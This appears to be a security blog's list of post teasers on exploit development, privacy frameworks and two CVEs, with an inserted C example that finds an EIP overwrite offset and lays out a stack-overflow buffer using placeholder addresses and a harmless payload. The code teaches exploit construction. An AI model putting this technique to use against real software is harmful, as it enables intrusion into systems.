The Basics of Exploit Development 2: SEH Overflows
March 13, 2020, Andy Bowden, Consultant, Coalfire Labs
In this article we will be writing an exploit for a 32-bit Windows application vulnerable to Structured Exception Handler (SEH) overflows. While this type of exploit has been around for a long time, it is still applicable to modern systems.
The Significance of the NIST Privacy Framework
February 21, 2020, Mali Yared, Practice Director, Cyber Risk Advisory & Privacy, Coalfire
Kudos to the NIST Privacy Team! Privacy Framework v1.0 has finally been released. I’ve been tracking the growth of this initiative since the focus group was kicked off in September 2018 and respect its thoroughly explored yet fundamentally grassroots approach. A few points worth bringing to your attention:
The Basics of Exploit Development 1: Win32 Buffer Overflows
January 21, 2020, Andy Bowden, Consultant, Coalfire Labs
In this article we will cover the creation of an exploit for a 32-bit Windows application vulnerable to a buffer overflow, using X64dbg and the associated ERC plugin. As this is the first article in the series, we will look at the simplest case: a complete EIP overwrite where ESP points directly into our buffer. A basic knowledge of assembly and the Windows operating system will be useful but is not a requirement.
ERC.Net – A Toolset for Analyzing Windows Application Crashes
October 02, 2019, Andy Bowden, Consultant, Coalfire Labs
ERC.Net is a collection of tools designed to assist in analyzing and debugging Windows application crashes in order to identify potential security vulnerabilities. Supporting both 64- and 32-bit applications, ERC.Net has many use cases, including parsing Windows file headers, identifying whether a module was built with protections such as ASLR, DEP and SafeSEH, generating non-repeating patterns and platform-specific egg hunters, enumerating process information such as loaded modules and running threads, reading the TEB of a specific thread, and assisting in the identification of numerous types of memory vulnerabilities.
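The two exploit-development teasers above share one step that ERC.Net's "non-repeating patterns" exist to automate: send a cyclic pattern, read the value that landed in EIP out of the debugger, and compute the offset at which the saved return address sits. The following is an added example written for this page; it is not code from the articles or from ERC.Net. It generates the classic Metasploit-style pattern, maps a crash value back to its offset (accounting for x86 little-endian byte order), and lays out the "ESP points into our buffer" case from the first article. The crash value 0x41356141, the JMP ESP address 0xDEADBEEF and the five-byte payload are constructed placeholders, not values from any real target.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Fill `out` with up to `len` bytes of the cyclic pattern Aa0Aa1...Az9Ba0...
 * The three-character groups do not repeat for 20280 bytes, so a 4-byte
 * value read from EIP maps back to a single offset.
 * Returns the number of bytes written; `out` must hold len + 1 bytes. */
size_t pattern_create(char *out, size_t len)
{
    size_t n = 0;
    for (char u = 'A'; u <= 'Z'; u++)
        for (char l = 'a'; l <= 'z'; l++)
            for (char d = '0'; d <= '9'; d++) {
                const char trip[3] = { u, l, d };
                for (int i = 0; i < 3; i++) {
                    if (n == len) {
                        out[n] = '\0';
                        return n;
                    }
                    out[n++] = trip[i];
                }
            }
    out[n] = '\0';
    return n;
}

/* Locate the 32-bit value the debugger reported in EIP inside the pattern.
 * x86 is little-endian, so EIP = 0x41356141 means the bytes "Aa5A" were
 * written over the saved return address. Returns -1 if not found. */
long pattern_offset(const char *pat, size_t len, uint32_t eip)
{
    unsigned char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)((eip >> (8 * i)) & 0xff);
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Lay out the buffer for the case where ESP points into our buffer:
 * [padding up to saved EIP][address of a JMP ESP][payload].
 * `jmp_esp` must come from a module without ASLR; the caller supplies it.
 * Returns the total length written, or 0 if `out` is too small. */
size_t build_buffer(unsigned char *out, size_t cap, size_t eip_offset,
                    uint32_t jmp_esp, const unsigned char *payload,
                    size_t payload_len)
{
    size_t total = eip_offset + 4 + payload_len;
    if (total > cap)
        return 0;
    memset(out, 'A', eip_offset);                 /* junk up to saved EIP */
    for (int i = 0; i < 4; i++)                   /* little-endian address */
        out[eip_offset + i] = (unsigned char)((jmp_esp >> (8 * i)) & 0xff);
    memcpy(out + eip_offset + 4, payload, payload_len); /* lands at ESP */
    return total;
}

int main(void)
{
    char pat[5001];
    size_t n = pattern_create(pat, 5000);

    /* Constructed crash value: pretend the debugger showed EIP = 0x41356141 */
    uint32_t crashed_eip = 0x41356141u;
    long off = pattern_offset(pat, n, crashed_eip);
    printf("EIP 0x%08x overwritten at offset %ld\n", crashed_eip, off);

    /* Constructed payload: short NOP sled then INT3 so the debugger breaks.
     * 0xDEADBEEF is a placeholder for a real JMP ESP address. */
    const unsigned char payload[] = { 0x90, 0x90, 0x90, 0x90, 0xCC };
    unsigned char buf[5100];
    size_t len = build_buffer(buf, sizeof buf, (size_t)off, 0xDEADBEEFu,
                              payload, sizeof payload);
    printf("exploit buffer: %zu bytes\n", len);
    return 0;
}
```

The little-endian conversion is the step that trips people up: the debugger shows EIP as a number, but the pattern was written as bytes, so the four bytes have to be reversed before searching. The same offset-finding routine applies to an SEH overwrite, except that the value looked up is the one that landed in the handler pointer rather than in EIP.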
When Checking the Box Results in Two Zero Days and Root (CVE-2019-14257 and CVE-2019-14258)
August 21, 2019, Jakob Nelson, Associate, Coalfire Labs
Finding new bugs and exploiting them can be exciting and fun for a penetration tester. I was ecstatic to find my first two zero-days, and I used them to break a system from no access to root. This was a good day for me – but the story behind the story provides some real lessons enterprises can apply to their security programs.